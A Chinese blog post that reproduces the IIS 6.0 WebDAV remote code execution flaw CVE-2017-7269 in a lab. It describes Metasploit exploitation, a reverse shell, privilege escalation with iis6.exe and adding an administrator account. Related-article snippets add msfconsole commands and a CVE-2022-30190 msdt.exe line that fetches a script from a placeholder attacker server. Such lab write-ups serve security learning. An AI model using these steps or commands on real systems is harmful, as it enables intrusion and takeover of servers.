CVE-2017-7269(iis6.0远程代码执行漏洞复现)

最新推荐文章于 2024-08-07 20:58:56 发布
最新推荐文章于 2024-08-07 20:58:56 发布
阅读量1.8w 收藏 75
点赞数 14
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/79568430
版权

前言

 趁着有时间,没事干,无聊!所以就拿CVE-2017-7269做一个简单的漏洞复现实战演练!下面就对该漏洞进行简单的简介以及复现。

 

漏洞描述

漏洞编号:CVE-2017-7269

发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)

 

漏洞描述:IIS 6.0默认不开启WebDAV,一旦开启了WebDAV支持,安装了IIS6.0的服务器将可能受到该漏洞的威胁。

 

漏洞类型:缓冲区溢出

漏洞等级:高危

 

影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS 6.0

触发函数:ScStoragePathFromUr函数

附加信息:ScStoragePathFromUr函数被调用了两次

漏洞细节:Windows server 2003 R2版本IIS6.0的WebDAV服务中的ScStorgPathFromUrl函数存在缓冲区溢出漏洞,远程攻击者通过以“if:<http://"开头的长header PROPFIND请求,执行任意代码。该漏洞在2016年7月份起就已被利用”。

漏洞环境搭建

目标主机:Windows server 2003  R2     192.168.11.133

攻击主机:Kali 2018   192.168.11.145

下载IIS 6.0并且安装IIS 6.0

 

中间一路下一步,如果有跳出窗口让选择,则选择之前下载的IIS 6.0的文件目录即可!

 

到这里之后IIS 6.0安装完成!同时可以看到IIS6.0完成了安装:

 

 

 

之后将WebDeV开启

 

 

至此环境搭建完成!

漏洞复现

下载exploit:https://github.com/Al1ex/CVE-2017-7269

将exploit复制到攻击机中Metasploit的iis模块下面:

/usr/share/metasploit-framework/modules/exploits/windows/iis

再Metasploit调用该模块

查看需要的配置选项

设置目标主机的IP地址、本地IP地址、HttpHost、payload(用于反弹一个shell)

一切配置就绪之后,开始利用

之后输入shell,获得一个交互端

查看权限

之后进入C盘根目录创建一个名为“hps”的文件夹,为提权操作做准备

之后暂时退出shell交互,上传iis6.exe到指定的hps目录下面

之后再次切换进入shell,

验证文件上传成功与否

使用IIS 6.exe提权

之后我们可以使用iis6.exe创建用户,并将其添加到管理员组

至此,我们已经完成了该漏洞的验证、利用漏洞进行提权操作,至于后渗透测试阶段还有很多可以做的事情,这里就不再过多的复述了,读者如果感兴趣可以自我尝试!

 

FLy_鹏程万里
关注
专栏目录
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address端口 效果如下:
CVE-2017-7269(远程代码执行漏洞)
Picturej的博客
12-10 399
第一 iis 必须为6.0第二系统windows server2003msf框架使用cve-2017-7269如果没有的话,需要提前导入这个模块msfconsole配置相关信息进来发现权限很低需要进行提权发现了在c盘可以创建文件尝试上传文件来提权拿文件来提权查看当前用户权限,发现提权了。
复现CVE-2017-7269(过程,步骤,说明)
XZ_______的博客
12-20 3064
配置环境:Windows server 2003 靶机 kali2.0以上版本 前言:做实验之前要确定一下靶机与攻击主机可以互相通信 一、配置Windows server 2003 靶机 1、打开添加/删除windows程序点击添加/删除windows组件 2、安装iis6.0中间件: 3、打开iisiis中的webDAV改为允许 4、打开网站找到默认网站右击属性,将ip地址改为本机ip地址 这个时候呢我们的靶机已经配置完毕了,接下来我们来配置我们的kali 二、开启kali (第一次使用msfc
IIS RCE-CVE-2017-7269
最新发布
2201_75891821的博客
08-07 175
Microsoft windows Server 2003 R2中的 Interne信息服务IIS6.0中的 WebDAV服务中的 ScStoragePathFromUrl函数中的缓冲区溢出允许远程攻击者通过以 If。
IIS6.0漏洞CVE-2017-7269 远程代码执行漏洞复现及Poc验证
7Riven's blog
12-06 3859
漏洞描述 CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行 漏洞产生的原因 在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对...
cve-2017-7269
qfslyy的博客
12-19 2364
CEV-2017-7269(过程,步骤,说明) 1、 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) (只是个人学习笔记) 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) 之后需要将包引入到msf中: 可以选择数据库方式,将cve包导入到msf中,也可以直接将包放在目录:/usr/share/metasploit-framework/modules/exploits/w
网络安全2017-7269安全漏洞解析
qq_63060814的博客
04-04 6350
1,使用命令zenmap打开nmap图形化扫描工具,选择配置,点击新的配置或命令 找到模块http-webdav-scan,勾上选用该模块对目标靶机进行扫描 根据扫描结果的信息可以找到靶机的操作系统为Microsoft Windows Server 2003 R2,并且开启WebDAV服务的IIS6.0,初步可以确认该漏洞存在 服务器版本信息: 使用msfconsole命令打开metasploit漏洞测试平台 使用search命令搜索cve-2017-7269 ...
学着分析CVE-2017-7269 -- IIS 6.0 WebDAV远程代码执行漏洞
giantbranch的专栏
04-03 7061
简介 CVE编号:CVE-2017-7269 漏洞级别:严重 漏洞影响:Windows Server 2003 r2 IIS6.0 漏洞发现人:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞类型:缓冲区溢出 实验环境 Windows Server 2003 r2 IIS6.0 procexp
cve-2017-7269-iis6.0环境搭建及复现过程
04-30
CVE-2017-7269 是一个针对Microsoft IIS 6.0 WebDAV扩展的远程代码执行漏洞。此漏洞允许攻击者在未经过身份验证的情况下向IIS 6.0服务器发送恶意HTTP请求,从而在服务器上执行任意代码。由于IIS 6.0主要应用于...
cve-2017-7269-iis6.0 poc metersploit
04-30
cve-2017-7269-iis6.0 的poc 再metersploit中使用,亲测可用。
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞iis服务提权工具。
cve-2017-7269远程代码执行漏洞复现
嗷空酒的博客
12-11 1160
cve_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)发现的。IIS 6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行,目前针对 Windows Server 2003 R2 可以稳定利用;
探秘CVE-2017-7269 Echo PoC:一款揭秘网络漏洞的强大工具
gitblog_00014的博客
04-03 473
探秘CVE-2017-7269 Echo PoC:一款揭秘网络漏洞的强大工具 项目地址:https://gitcode.com/lcatro/CVE-2017-7269-Echo-PoC 该项目是GitHub上的一个开源代码库,由lcatro维护,用于演示和分析 CVE-2017-7269 漏洞。这是一个网络安全领域的重要资源,有助于开发者、安全研究员和IT专业人员深入理解并防御此类攻击。 项目...
IIS 6.0 WebDAV远程代码执行(CVE-2017-7269) 含POC与修复方法
Anprou的博客
03-28 5435
2015年7月15日,微软已停止对Windows Server 2003的支持,所以官方没有相关解决方案,建议用户升级到最新系统 Windows Server 2016。
iis6.0cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因
redwand的博客
05-04 1273
网上看到的iis6.0cve-2017-7269)的利用文章,要么只有远程利用不包含本地提权,要么包含本地提权却没有常见失败原因,故有此文 本篇文章面向有一点windows命令行基础,kali基础,msf基础的同学
CVE-2017-7269IIS远程代码执行
浅笑996的博客
11-20 1382
利用CVE-2017-7269IIS向自己的msf反弹一个shell 确认目标是IIS并且开启webdav 打开msf,使用exp msfconsole use exploit/windows/iis/cve-2017-7269 set rhost 192.168.91.129 show options run 获得一个meterpreter ...
IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现——踩坑记
W小哥
04-24 2401
一、漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。 二、影响版本以及利用条件 Windows 2003 R2开启WebDAV服务的IIS6.0 三、漏洞环境搭建 Windows server 2003 R2 安装IIS服务,并且开启了WebDAV Exp下载地址:https://github.com/zcgonvh/cve...
CVE-2017-7269 IIS6.0WebDAV远程代码执行漏洞复现(Window提权)
ranuy阮的博客
04-19 2517
漏洞说明:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。 影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证) 触发函数:ScStoragePathFromUr...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值